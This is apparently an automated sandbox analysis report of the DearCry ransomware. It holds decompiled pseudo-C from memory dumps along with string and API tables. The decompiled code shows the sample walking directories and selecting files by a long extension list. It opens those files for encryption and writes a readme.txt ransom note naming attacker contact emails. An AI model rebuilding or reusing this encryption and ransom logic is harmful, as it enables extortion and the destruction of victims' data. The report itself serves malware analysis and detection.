                                                              												_t134 = _t134 + 0xc;
                                                              											}
                                                              											_t114 = E00C6D8C9(__eflags);
                                                              											_push(_t133);
                                                              											_push(_t133);
                                                              											_push(_t133);
                                                              											_push(_t133);
                                                              											 *_t114 = 0x22;
                                                              											_push(_t133);
                                                              											goto L4;
                                                              										} else {
                                                              											E00C72BAD(_t120, _t123, _t125, _v12, _v8,  *_t133, _t131);
                                                              											 *(_t133 + 4) =  *(_t133 + 4) - _t131;
                                                              											 *_t133 =  *_t133 + _t131;
                                                              											_v12 = _v12 + _t131;
                                                              											_t120 = _t120 - _t131;
                                                              											_t134 = _t134 + 0x10;
                                                              											_v8 = _v8 - _t131;
                                                              											_t131 = _v20;
                                                              										}
                                                              										L39:
                                                              										__eflags = _t120;
                                                              									} while (_t120 != 0);
                                                              									goto L40;
                                                              								}
                                                              							}
                                                              						}
                                                              						_t118 = _t90 | 0xffffffff;
                                                              						_t90 = _t118 / _a12;
                                                              						_t125 = _t118 % _a12;
                                                              						__eflags = _a16 - _t90;
                                                              						if(_a16 <= _t90) {
                                                              							goto L13;
                                                              						}
                                                              						goto L9;
                                                              					}
                                                              					L3:
                                                              					_t92 = E00C6D8C9(_t138);
                                                              					_push(_t131);
                                                              					_push(_t131);
                                                              					_push(_t131);
                                                              					_push(_t131);
                                                              					 *_t92 = 0x16;
                                                              					_push(_t131);
                                                              					goto L4;
                                                              				}
                                                              			}






























                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              • Associated: 00000000.00000002.495421909.0000000000B90000.00000002.00020000.sdmp
                                                              • Associated: 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp
                                                              • Associated: 00000000.00000002.495617724.0000000000CC1000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495636849.0000000000CC2000.00000008.00020000.sdmp
                                                              • Associated: 00000000.00000002.495653681.0000000000CC5000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495669555.0000000000CC9000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495696741.0000000000DC9000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495725492.0000000000ECA000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495741240.0000000000ECC000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495757375.0000000000ECE000.00000002.00020000.sdmp
                                                              Similarity
                                                              • API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
                                                              • String ID:
                                                              • API String ID: 3886058894-0
                                                              • Opcode ID: f4a219d403e3402404f687f20ce666abf1e957fd9eb65b1326e34f0e223bcd6a
                                                              • Instruction ID: 73604558041a2a158d32349dde6c6bc171407461b1b23e007e1cbdcd038566a5
                                                              • Opcode Fuzzy Hash: f4a219d403e3402404f687f20ce666abf1e957fd9eb65b1326e34f0e223bcd6a
                                                              • Instruction Fuzzy Hash: 4051A631A00605EFCB309FAA89C499EBBB5EF81320F24866AF435B61D1D7709E51DF52
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 85%
                                                              			E00B91A36(void* __eax, char** __ebx, intOrPtr* __esi) {
                                                              				int _t89;
                                                              				intOrPtr* _t90;
                                                              				char** _t91;
                                                              				intOrPtr* _t92;
                                                              				void* _t100;
                                                              				intOrPtr* _t101;
                                                              				char** _t103;
                                                              				char** _t104;
                                                              				char** _t109;
                                                              				char** _t110;
                                                              				intOrPtr* _t111;
                                                              				char** _t112;
                                                              				char* _t115;
                                                              				char** _t116;
                                                              				char _t119;
                                                              				intOrPtr* _t120;
                                                              				char** _t123;
                                                              				intOrPtr* _t124;
                                                              				intOrPtr* _t126;
                                                              				char** _t130;
                                                              				char** _t132;
                                                              				intOrPtr* _t135;
                                                              				void* _t137;
                                                              				intOrPtr* _t138;
                                                              				intOrPtr* _t140;
                                                              				void* _t144;
                                                              				intOrPtr* _t149;
                                                              				char _t153;
                                                              				intOrPtr* _t154;
                                                              				intOrPtr _t158;
                                                              				intOrPtr _t165;
                                                              				char** _t166;
                                                              				char** _t168;
                                                              				char** _t169;
                                                              				char** _t171;
                                                              				char* _t172;
                                                              				char* _t173;
                                                              				char** _t174;
                                                              				char** _t176;
                                                              				char* _t178;
                                                              				char** _t179;
                                                              				intOrPtr _t180;
                                                              				intOrPtr _t181;
                                                              				intOrPtr _t182;
                                                              				intOrPtr _t184;
                                                              				void* _t186;
                                                              				void* _t187;
                                                              				char* _t191;
                                                              				char** _t194;
                                                              				char** _t195;
                                                              				void* _t198;
                                                              				void* _t199;
                                                              				void* _t200;
                                                              				char** _t201;
                                                              				signed int _t202;
                                                              				char** _t204;
                                                              				char** _t205;
                                                              				void* _t206;
                                                              				void* _t207;
                                                              				intOrPtr _t210;
                                                              				intOrPtr* _t211;
                                                              				intOrPtr _t212;
                                                              				signed int _t213;
                                                              				void* _t215;
                                                              				void* _t219;
                                                              				void* _t220;
                                                              				void* _t221;
                                                              				void* _t222;
                                                              
                                                              				_t211 = __esi;
                                                              				_t157 = __ebx;
                                                              				while(1) {
                                                              					L49:
                                                              					_t168 =  *((intOrPtr*)(_t213 + _t100 - 0xf98));
                                                              					 *((char*)(_t213 + _t100 - 0x568)) = _t168;
                                                              					_t100 = _t100 + 1;
                                                              					__eflags = _t168;
                                                              					if(_t168 != 0) {
                                                              						continue;
                                                              					}
                                                              					L50:
                                                              					_t201 = 0;
                                                              					__eflags = 0;
                                                              					_t101 = _t213 - 0x568;
                                                              					_t185 = _t101 + 1;
                                                              					do {
                                                              						_t169 =  *_t101;
                                                              						_t101 = _t101 + 1;
                                                              						__eflags = _t169;
                                                              					} while (_t169 != 0);
                                                              					__eflags = _t101 != _t185;
                                                              					if(_t101 != _t185) {
                                                              						do {
                                                              							_t119 = E00C6AFFA( *((char*)(_t213 + _t201 - 0x568)));
                                                              							_t215 = _t215 + 4;
                                                              							 *((char*)(_t213 + _t201 - 0x568)) = _t119;
                                                              							_t201 =  &(_t201[0]);
                                                              							__eflags = _t201;
                                                              							_t120 = _t213 - 0x568;
                                                              							_t185 = _t120 + 1;
                                                              							do {
                                                              								_t176 =  *_t120;
                                                              								_t120 = _t120 + 1;
                                                              								__eflags = _t176;
                                                              							} while (_t176 != 0);
                                                              							__eflags = _t201 - _t120 - _t185;
                                                              						} while (_t201 < _t120 - _t185);
                                                              					}
                                                              					_t202 = 0;
                                                              					__eflags =  *0xec9fb0;
                                                              					if( *0xec9fb0 != 0) {
                                                              						_t115 = 0xec9fb0;
                                                              						while(1) {
                                                              							_t185 = _t213 - 0x568;
                                                              							_t116 = E00C6A360(_t213 - 0x568, _t115);
                                                              							_t215 = _t215 + 8;
                                                              							__eflags = _t116;
                                                              							if(_t116 != 0) {
                                                              								break;
                                                              							}
                                                              							_t202 = _t202 + 1;
                                                              							_t115 = 0xec9fb0 + _t202 * 0xff;
                                                              							__eflags =  *_t115;
                                                              							if( *_t115 != 0) {
                                                              								continue;
                                                              							} else {
                                                              							}
                                                              							goto L63;
                                                              						}
                                                              						 *((char*)(_t213 - 0x15f1)) = 0;
                                                              					}
                                                              					L63:
                                                              					_t204 = _t213 - 0xf97;
                                                              					__eflags = _t204;
                                                              					do {
                                                              						_t103 = _t204[0];
                                                              						_t204 =  &(_t204[0]);
                                                              						__eflags = _t103;
                                                              					} while (_t103 != 0);
                                                              					_t160 = "\\"; // 0x5c
                                                              					 *_t204 = _t160;
                                                              					__eflags =  *((intOrPtr*)(_t213 - 0x15f1)) - _t103;
                                                              					if( *((intOrPtr*)(_t213 - 0x15f1)) != _t103) {
                                                              						_t104 = E00C6A360(_t213 - 0x568, "DESKTOP");
                                                              						_t219 = _t215 + 8;
                                                              						__eflags = _t104;
                                                              						if(_t104 != 0) {
                                                              							_t109 = _t213 - 0x567;
                                                              							__eflags = _t109;
                                                              							do {
                                                              								_t171 = _t109[0];
                                                              								_t109 =  &(_t109[0]);
                                                              								__eflags = _t171;
                                                              							} while (_t171 != 0);
                                                              							_t172 = "/readme.txt"; // 0x6165722f
                                                              							 *_t109 = _t172;
                                                              							_t191 = M00CBF7C8; // 0x2e656d64
                                                              							_t109[1] = _t191;
                                                              							_t173 =  *0xcbf7cc; // 0x747874
                                                              							_t109[2] = _t173;
                                                              							_t110 = L00C6A96D(_t213 - 0x568, "w+"); // executed
                                                              							_t219 = _t219 + 8;
                                                              							_t205 = _t110;
                                                              							__eflags = _t205;
                                                              							if(_t205 != 0) {
                                                              								_t111 = 0xdc9fb0;
                                                              								do {
                                                              									_t174 =  *_t111;
                                                              									_t111 = _t111 + 1;
                                                              									__eflags = _t174;
                                                              								} while (_t174 != 0);
                                                              								_t112 = _t111 - 0xdc9fb1;
                                                              								__eflags = _t112;
                                                              								_push(_t205);
                                                              								_push(_t112);
                                                              								_push(1);
                                                              								_push("Your file has been encrypted!						 If you want to decrypt, please contact us.						 konedieyp@airmail.cc or uenwonken@memail.com						 And please send me the following hash!						 d37fc1eabc6783a418d23a8d2ba5db5a");
                                                              								E00C6ADA3(_t157, 0xdc9fb1, _t205, _t211, __eflags);
                                                              								_push(_t205); // executed
                                                              								E00C6B1A7(_t157, 0xdc9fb1, _t205, _t211, __eflags); // executed
                                                              								_t219 = _t219 + 0x14;
                                                              							}
                                                              						}
                                                              						_t160 = _t213 - 0xf98;
                                                              						_t185 =  *(_t213 - 0x1600);
                                                              						E00B91640( *(_t213 - 0x1600), _t213 - 0xf98,  *(_t213 + 0x10),  *((intOrPtr*)(_t213 + 0x14)),  *((intOrPtr*)(_t213 - 0x15f8)),  *((intOrPtr*)(_t213 - 0x15fc))); // executed
                                                              						_t215 = _t219 + 0x18;
                                                              					}
                                                              					 *((char*)(_t213 - 0x15f1)) = 1;
                                                              					while(1) {
                                                              						L75:
                                                              						_t199 =  *(_t213 - 0x1608);
                                                              						_t89 = FindNextFileA(_t199, _t213 - 0x15f0); // executed
                                                              						if(_t89 == 0) {
                                                              							break;
                                                              						}
                                                              						if(( *(_t213 - 0x15f0) & 0x00000010) != 0) {
                                                              							__eflags =  *(_t213 - 0x15c4) - 0x2e;
                                                              							if( *(_t213 - 0x15c4) != 0x2e) {
                                                              								_t90 = _t211;
                                                              								_t187 = _t90 + 1;
                                                              								do {
                                                              									_t166 =  *_t90;
                                                              									_t90 = _t90 + 1;
                                                              									__eflags = _t166;
                                                              								} while (_t166 != 0);
                                                              								_t91 = _t90 - _t187;
                                                              								__eflags = _t91;
                                                              								_t185 = _t91;
                                                              								_t92 = _t213 - 0x15c4;
                                                              								_t46 = _t92 + 1; // 0x2f
                                                              								_t200 = _t46;
                                                              								do {
                                                              									_t160 =  *_t92;
                                                              									_t92 = _t92 + 1;
                                                              									__eflags = _t160;
                                                              								} while (_t160 != 0);
                                                              								__eflags = _t92 - _t200 + _t185 - 0x514;
                                                              								if(_t92 - _t200 + _t185 < 0x514) {
                                                              									E00C6BB40(_t200, _t213 - 0xf98, 0, 0x514);
                                                              									E00C6BB40(_t200, _t213 - 0x568, 0, 0x514);
                                                              									_push(_t213 - 0x15c4);
                                                              									E00C69C35(_t200, _t211, _t213 - 0xf98, "%s%s", _t211);
                                                              									_t215 = _t215 + 0x28;
                                                              									_t100 = 0;
                                                              									do {
                                                              										goto L49;
                                                              									} while (_t168 != 0);
                                                              									goto L50;
                                                              								}
                                                              							}
                                                              						} else {
                                                              							_t123 = E00C6AE30(_t160, _t213 - 0x15c4, 0x2e);
                                                              							_t215 = _t215 + 8;
                                                              							_t157 = _t123;
                                                              							if(_t157 != 0) {
                                                              								_t124 = _t211;
                                                              								_t186 = _t124 + 1;
                                                              								do {
                                                              									_t165 =  *_t124;
                                                              									_t124 = _t124 + 1;
                                                              								} while (_t165 != 0);
                                                              								_t185 = _t124 - _t186;
                                                              								_t126 = _t213 - 0x15c4;
                                                              								_t206 = _t126 + 1;
                                                              								do {
                                                              									_t160 =  *_t126;
                                                              									_t126 = _t126 + 1;
                                                              								} while (_t160 != 0);
                                                              								if(_t126 - _t206 + _t185 < 0x514) {
                                                              									E00C6BB40(_t206, _t213 - 0x50, 0, 0x32);
                                                              									_t220 = _t215 + 0xc;
                                                              									_t130 = _t157;
                                                              									_t9 =  &(_t130[0]); // 0x1
                                                              									_t194 = _t9;
                                                              									do {
                                                              										_t178 =  *_t130;
                                                              										_t130 =  &(_t130[0]);
                                                              									} while (_t178 != 0);
                                                              									if(_t130 - _t194 <= 0x32) {
                                                              										_t132 = _t157;
                                                              										_t10 =  &(_t132[0]); // 0x1
                                                              										_t195 = _t10;
                                                              										do {
                                                              											_t179 =  *_t132;
                                                              											_t132 =  &(_t132[0]);
                                                              											__eflags = _t179;
                                                              										} while (_t179 != 0);
                                                              										_t133 = _t132 - _t195;
                                                              										__eflags = _t132 - _t195;
                                                              									} else {
                                                              										_t133 = 0x32;
                                                              									}
                                                              									E00C6A6C0(_t213 - 0x50, _t157, _t133);
                                                              									_t221 = _t220 + 0xc;
                                                              									_t207 = 0;
                                                              									_t135 = _t213 - 0x50;
                                                              									_t185 = _t135 + 1;
                                                              									do {
                                                              										_t180 =  *_t135;
                                                              										_t135 = _t135 + 1;
                                                              									} while (_t180 != 0);
                                                              									if(_t135 != _t185) {
                                                              										do {
                                                              											_t153 = E00C6AFFA( *((char*)(_t213 + _t207 - 0x50)));
                                                              											_t221 = _t221 + 4;
                                                              											 *((char*)(_t213 + _t207 - 0x50)) = _t153;
                                                              											_t207 = _t207 + 1;
                                                              											_t154 = _t213 - 0x50;
                                                              											_t185 = _t154 + 1;
                                                              											do {
                                                              												_t184 =  *_t154;
                                                              												_t154 = _t154 + 1;
                                                              											} while (_t184 != 0);
                                                              										} while (_t207 < _t154 - _t185);
                                                              									}
                                                              									_t160 = _t213 - 0x50;
                                                              									_t137 = E00C6A360(".TIF .TIFF .PDF .XLS .XLSX .XLTM .PS .PPS .PPT .PPTX .DOC .DOCX .LOG .MSG .RTF .TEX .TXT .CAD .WPS .EML .INI .CSS .HTM .HTML  .XHTML .JS .JSP .PHP .KEYCHAIN .PEM .SQL .APK .APP .BAT .CGI .ASPX .CER .CFM .C .CPP .GO .CONFIG.CSV .DAT .ISO .PST .PGD  .7Z .RAR .ZIP .ZIPX .TAR .PDB .BIN .DB .MDB .MDF .BAK .LOG .EDB .STM .DBF .ORA", _t213 - 0x50);
                                                              									_t215 = _t221 + 8;
                                                              									if(_t137 != 0) {
                                                              										_t160 = "readme.txt";
                                                              										_t138 = _t213 - 0x15c4;
                                                              										while(1) {
                                                              											_t185 =  *_t138;
                                                              											if(_t185 !=  *_t160) {
                                                              												break;
                                                              											}
                                                              											if(_t185 == 0) {
                                                              												L28:
                                                              												_t138 = 0;
                                                              											} else {
                                                              												_t185 =  *((intOrPtr*)(_t138 + 1));
                                                              												if(_t185 != _t160[1]) {
                                                              													break;
                                                              												} else {
                                                              													_t138 = _t138 + 2;
                                                              													_t160 =  &(_t160[2]);
                                                              													if(_t185 != 0) {
                                                              														continue;
                                                              													} else {
                                                              														goto L28;
                                                              													}
                                                              												}
                                                              											}
                                                              											L30:
                                                              											if(_t138 != 0) {
                                                              												E00C6BB40(_t207, _t213 - 0xa80, 0, 0x514);
                                                              												_t222 = _t215 + 0xc;
                                                              												_t140 = _t211;
                                                              												_t198 = _t140 + 1;
                                                              												do {
                                                              													_t181 =  *_t140;
                                                              													_t140 = _t140 + 1;
                                                              												} while (_t181 != 0);
                                                              												if( *((char*)(_t140 - _t198 + _t211 - 1)) == 0x5c) {
                                                              													L38:
                                                              													_t185 = _t213 - 0x15c4;
                                                              													_push(_t213 - 0x15c4);
                                                              													_push(_t211);
                                                              													_push("%s%s");
                                                              													_push(_t213 - 0xa80);
                                                              												} else {
                                                              													_t149 = _t211;
                                                              													_t185 = _t149 + 1;
                                                              													do {
                                                              														_t182 =  *_t149;
                                                              														_t149 = _t149 + 1;
                                                              													} while (_t182 != 0);
                                                              													if( *((char*)(_t149 - _t185 + _t211 - 1)) == 0x2f) {
                                                              														goto L38;
                                                              													} else {
                                                              														_push(_t213 - 0x15c4);
                                                              														_push(_t211);
                                                              														_push("%s\\%s");
                                                              														_push(_t213 - 0xa80);
                                                              													}
                                                              												}
                                                              												E00C69C35(_t207, _t211);
                                                              												 *((intOrPtr*)(_t213 - 4)) = 0;
                                                              												_t160 = _t213 - 0xa80;
                                                              												_t144 = L00C6A96D(_t213 - 0xa80, "rb+"); // executed
                                                              												_t215 = _t222 + 0x18;
                                                              												_t251 = _t144;
                                                              												if(_t144 != 0) {
                                                              													_push(_t144); // executed
                                                              													E00C6B1A7(_t157, _t185, _t207, _t211, _t251); // executed
                                                              													_t208 =  *((intOrPtr*)(_t213 - 0x15f8));
                                                              													E00C6BB40( *((intOrPtr*)(_t213 - 0x15f8)),  *((intOrPtr*)(_t213 - 0x15f8)), 0, 0x100000);
                                                              													E00C6BB40( *((intOrPtr*)(_t213 - 0x15f8)),  *((intOrPtr*)(_t213 - 0x15fc)), 0, 0x100000);
                                                              													_t185 =  *(_t213 + 0x10);
                                                              													_t157 =  *(_t213 - 0x1600);
                                                              													E00B915D0( *(_t213 - 0x1600), _t213 - 0xa80,  *(_t213 + 0x10), _t208,  *((intOrPtr*)(_t213 - 0x15fc)));
                                                              													_t215 = _t215 + 0x28;
                                                              												}
                                                              												 *((intOrPtr*)(_t213 - 4)) = 0xfffffffe;
                                                              											}
                                                              											goto L75;
                                                              										}
                                                              										asm("sbb eax, eax");
                                                              										asm("sbb eax, 0xffffffff");
                                                              										goto L30;
                                                              									}
                                                              								}
                                                              							}
                                                              						}
                                                              					}
                                                              					if(_t199 != 0xffffffff) {
                                                              						_t89 = FindClose(_t199); // executed
                                                              					}
                                                              					 *[fs:0x0] =  *((intOrPtr*)(_t213 - 0x10));
                                                              					_pop(_t210);
                                                              					_pop(_t212);
                                                              					_pop(_t158);
                                                              					return E00C69C26(_t89, _t158,  *(_t213 - 0x1c) ^ _t213, _t185, _t210, _t212);
                                                              					L49:
                                                              					_t168 =  *((intOrPtr*)(_t213 + _t100 - 0xf98));
                                                              					 *((char*)(_t213 + _t100 - 0x568)) = _t168;
                                                              					_t100 = _t100 + 1;
                                                              					__eflags = _t168;
                                                              				}
                                                              			}

                                                              Strings
                                                              • Your file has been encrypted! If you want to decrypt, please contact us. konedieyp@airmail.cc or uenwonken@memail.com And please send me the following hash! d37fc1eabc6783a418d23a8d2ba5db5a, xrefs: 00B91B61, 00B91B7A, 00B91B7D
                                                              • /readme.txt, xrefs: 00B91B2D
                                                              • DESKTOP, xrefs: 00B91B06
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              • Associated: 00000000.00000002.495421909.0000000000B90000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495617724.0000000000CC1000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495636849.0000000000CC2000.00000008.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495653681.0000000000CC5000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495669555.0000000000CC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495696741.0000000000DC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495725492.0000000000ECA000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495741240.0000000000ECC000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495757375.0000000000ECE000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID: /readme.txt$DESKTOP$Your file has been encrypted! If you want to decrypt, please contact us. konedieyp@airmail.cc or uenwonken@memail.com And please send me the following hash! d37fc1eabc6783a418d23a8d2ba5db5a
                                                              • API String ID: 0-1364712149
                                                              • Opcode ID: 78b6c21cae9e91cf0aaf074b6f8f5505da5ba276f1fd87313cce715f85137d56
                                                              • Instruction ID: 72fa04c56e7dea4c50291cf7d448685dff0c3eb383c0770aded2283b19c40b89
                                                              • Opcode Fuzzy Hash: 78b6c21cae9e91cf0aaf074b6f8f5505da5ba276f1fd87313cce715f85137d56
                                                              • Instruction Fuzzy Hash: 235122719006478BCF20CF18DC94BFAB7F9EB85340F1846F8E81997252EA319D86DB50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E00B910C0(intOrPtr __ebx, char __esi, void* __ebp) {
                                                              				signed int _v4;
                                                              				char _v260;
                                                              				char _v516;
                                                              				char _v524;
                                                              				char _v528;
                                                              				void* _v532;
                                                              				void* __edi;
                                                              				signed int _t16;
                                                              				void* _t19;
                                                              				void* _t24;
                                                              				void* _t25;
                                                              				void* _t26;
                                                              				intOrPtr _t27;
                                                              				void* _t29;
                                                              				intOrPtr _t30;
                                                              				void* _t33;
                                                              				signed int _t38;
                                                              				char _t39;
                                                              				signed int _t41;
                                                              				void* _t42;
                                                              				signed int _t54;
                                                              
                                                              				_t39 = __esi;
                                                              				_t30 = __ebx;
                                                              				_t41 =  &_v532;
                                                              				_t16 =  *0xcc5970; // 0x851ab4dd
                                                              				_v4 = _t16 ^ _t41;
                                                              				_t38 = 0; // executed
                                                              				_t19 = E00C6AC24( &_v516, 1, 8, __esi); // executed
                                                              				_t42 = _t41 + 0x10;
                                                              				if(_t19 != 8) {
                                                              					L11:
                                                              					E00C6B1A7(_t30, _t37, _t38, _t39, _t54); // executed
                                                              					return E00C69C26(_t38, _t30, _v4 ^ _t42 + 0x00000004, _t37, _t38, _t39, _t39);
                                                              				} else {
                                                              					_t33 = 0;
                                                              					while(1) {
                                                              						_t37 =  *((intOrPtr*)(_t42 + _t33 + 0x14));
                                                              						_t5 = _t33 + "DEARCRY!"; // 0x52414544
                                                              						if( *((intOrPtr*)(_t42 + _t33 + 0x14)) !=  *_t5) {
                                                              							goto L11;
                                                              						}
                                                              						_t19 = _t19 - 4;
                                                              						_t33 = _t33 + 4;
                                                              						if(_t19 >= 4) {
                                                              							continue;
                                                              						}
                                                              						_t24 = E00C6AC24( &_v532, 1, 4, _t39);
                                                              						_t42 = _t42 + 0x10;
                                                              						if(_t24 == 4 && _v532 == 0x100) {
                                                              							_t25 = E00C6AC24( &_v260, 1, 0x100, _t39);
                                                              							_t42 = _t42 + 0x10;
                                                              							if(_t25 == _v532) {
                                                              								_t37 =  &_v528;
                                                              								_t26 = E00C6AC24( &_v528, 1, 4, _t39);
                                                              								_t42 = _t42 + 0x10;
                                                              								if(_t26 == 4) {
                                                              									_t27 = _v528;
                                                              									if(_t27 == 3 || _t27 == 4) {
                                                              										_t29 = E00C6AC24( &_v524, 1, 8, _t39);
                                                              										_t42 = _t42 + 0x10;
                                                              										_t14 = _t29 == 8;
                                                              										_t54 = _t14;
                                                              										_t38 = 0 | _t14;
                                                              									}
                                                              								}
                                                              							}
                                                              						}
                                                              						goto L11;
                                                              					}
                                                              					goto L11;
                                                              				}
                                                              			}

























                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              • Associated: 00000000.00000002.495421909.0000000000B90000.00000002.00020000.sdmp
                                                              • Associated: 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp
                                                              • Associated: 00000000.00000002.495617724.0000000000CC1000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495636849.0000000000CC2000.00000008.00020000.sdmp
                                                              • Associated: 00000000.00000002.495653681.0000000000CC5000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495669555.0000000000CC9000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495696741.0000000000DC9000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495725492.0000000000ECA000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495741240.0000000000ECC000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495757375.0000000000ECE000.00000002.00020000.sdmp
                                                              Similarity
                                                              • API ID: __fread_nolock
                                                              • String ID:
                                                              • API String ID: 2638373210-0
                                                              • Opcode ID: d8063289e846f9151b46690068a3784d31b8fbefa203fd175fd5b29ea05b42d3
                                                              • Instruction ID: 5bbaf44d8135ecb583567a6e0ad93413b50458ff2d3b2b5e993b5da9f184b4cb
                                                              • Opcode Fuzzy Hash: d8063289e846f9151b46690068a3784d31b8fbefa203fd175fd5b29ea05b42d3
                                                              • Instruction Fuzzy Hash: FD21B07160420137FE30EA289CC6FBF3695EB91710F400C79F319E6181D675E58596A3
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 32%
                                                              			E00C69CB2(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                              				intOrPtr* _t10;
                                                              				intOrPtr _t13;
                                                              				intOrPtr _t24;
                                                              				void* _t26;
                                                              
                                                              				_push(0xc);
                                                              				_push(0xcbf980);
                                                              				_t8 = E00C70838(__ebx, __edi, __esi);
                                                              				_t24 =  *((intOrPtr*)(_t26 + 8));
                                                              				if(_t24 == 0) {
                                                              					L9:
                                                              					return E00C7087D(_t8);
                                                              				}
                                                              				if( *0xecc8dc != 3) {
                                                              					_push(_t24);
                                                              					L7:
                                                              					_push(0);
                                                              					_t8 = RtlFreeHeap( *0xcc9860); // executed
                                                              					_t32 = _t8;
                                                              					if(_t8 == 0) {
                                                              						_t10 = E00C6D8C9(_t32);
                                                              						 *_t10 = E00C6D887(GetLastError());
                                                              					}
                                                              					goto L9;
                                                              				}
                                                              				E00C6FD40(__ebx, __edi, 4);
                                                              				 *(_t26 - 4) =  *(_t26 - 4) & 0x00000000;
                                                              				_t13 = E00C6FD73(_t24);
                                                              				 *((intOrPtr*)(_t26 - 0x1c)) = _t13;
                                                              				if(_t13 != 0) {
                                                              					_push(_t24);
                                                              					_push(_t13);
                                                              					E00C6FDA3();
                                                              				}
                                                              				 *(_t26 - 4) = 0xfffffffe;
                                                              				_t8 = E00C69D08();
                                                              				if( *((intOrPtr*)(_t26 - 0x1c)) != 0) {
                                                              					goto L9;
                                                              				} else {
                                                              					_push( *((intOrPtr*)(_t26 + 8)));
                                                              					goto L7;
                                                              				}
                                                              			}








                                                              APIs
                                                              • __lock.LIBCMT ref: 00C69CD0
                                                                • Part of subcall function 00C6FD40: __mtinitlocknum.LIBCMT ref: 00C6FD56
                                                                • Part of subcall function 00C6FD40: __amsg_exit.LIBCMT ref: 00C6FD62
                                                                • Part of subcall function 00C6FD40: EnterCriticalSection.KERNEL32(?,?,?,00C70AAD,00000004,00CBFCC8,0000000C,00C69D5A,?,?,00000000,?,?,?,00B91010,00000021), ref: 00C6FD6A
                                                              • ___sbh_find_block.LIBCMT ref: 00C69CDB
                                                              • ___sbh_free_block.LIBCMT ref: 00C69CEA
                                                              • RtlFreeHeap.NTDLL(00000000,?,00CBF980,0000000C,00C740F9,00000000,?,00C716F3,?,00000001,?,?,00C6FCCA,00000018,00CBFCA8,0000000C), ref: 00C69D1A
                                                              • GetLastError.KERNEL32(?,00C716F3,?,00000001,?,?,00C6FCCA,00000018,00CBFCA8,0000000C,00C6FD5B,?,?,?,00C70AAD,00000004), ref: 00C69D2B
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              • Associated: 00000000.00000002.495421909.0000000000B90000.00000002.00020000.sdmp
                                                              • Associated: 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp
                                                              • Associated: 00000000.00000002.495617724.0000000000CC1000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495636849.0000000000CC2000.00000008.00020000.sdmp
                                                              • Associated: 00000000.00000002.495653681.0000000000CC5000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495669555.0000000000CC9000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495696741.0000000000DC9000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495725492.0000000000ECA000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495741240.0000000000ECC000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495757375.0000000000ECE000.00000002.00020000.sdmp
                                                              Similarity
                                                              • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                              • String ID:
                                                              • API String ID: 2714421763-0
                                                              • Opcode ID: 57613ffd878d4d37270d1685fbb02062414c18da91a36dfa804fdef85b2f67f5
                                                              • Instruction ID: a0eb959c140ed64cf6b08b8413b70d6c5eed71943d64b889e2036f6978d288f3
                                                              • Opcode Fuzzy Hash: 57613ffd878d4d37270d1685fbb02062414c18da91a36dfa804fdef85b2f67f5
                                                              • Instruction Fuzzy Hash: 0201D671E00306EADF347FB1AC8AB8D37B8EF12365F204028F5546A0D1CA349A41EB94
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 91%
                                                              			E00C6AC41(signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
                                                              				signed int _v8;
                                                              				signed int _v12;
                                                              				signed int _v16;
                                                              				void* __ebx;
                                                              				void* __edi;
                                                              				void* __esi;
                                                              				void* __ebp;
                                                              				signed int _t59;
                                                              				intOrPtr* _t61;
                                                              				signed int _t63;
                                                              				void* _t68;
                                                              				signed int _t69;
                                                              				signed int _t72;
                                                              				signed int _t74;
                                                              				signed int _t75;
                                                              				signed int _t77;
                                                              				signed int _t78;
                                                              				signed int _t81;
                                                              				signed int _t82;
                                                              				signed int _t84;
